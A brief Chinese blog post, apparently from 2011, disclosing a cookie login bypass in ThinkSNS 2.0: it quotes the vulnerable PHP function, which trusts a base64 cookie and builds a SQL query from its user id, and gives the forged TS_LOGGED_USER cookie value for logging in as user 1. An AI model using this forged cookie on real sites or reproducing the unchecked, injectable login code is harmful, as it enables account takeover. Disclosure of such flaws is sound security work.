ThinkSNS2.0 Cookie 漏洞

    1、源代码:

/**

* 使用cookie登陆

*

* @param string $cookieId

* @return boolean

*/

public function cookieLoginLocal($cookieId){ 

    $cookieId = explode( '.', base64_decode($cookieId) ); 

if ($cookieId[0] !== 'thinksns') { 

return false; 

    }else { 

        $userInfo = M('user')->where('uid='.$cookieId[1])->find(); 

return $this->loginLocal($userInfo['email']); 

    } 

    2、构造cookie   name=TS_LOGGED_USER; content="base64_encode('thinksns.1')";host:localhost;path:/
    3、测试成功(本地),测试thinksns在线demo是不成功的,应该是有过改动,为什么不在发行版本里修改掉呢?

posted on 2011-03-20 14:19  Moven  阅读(606)  评论(0编辑  收藏  举报

导航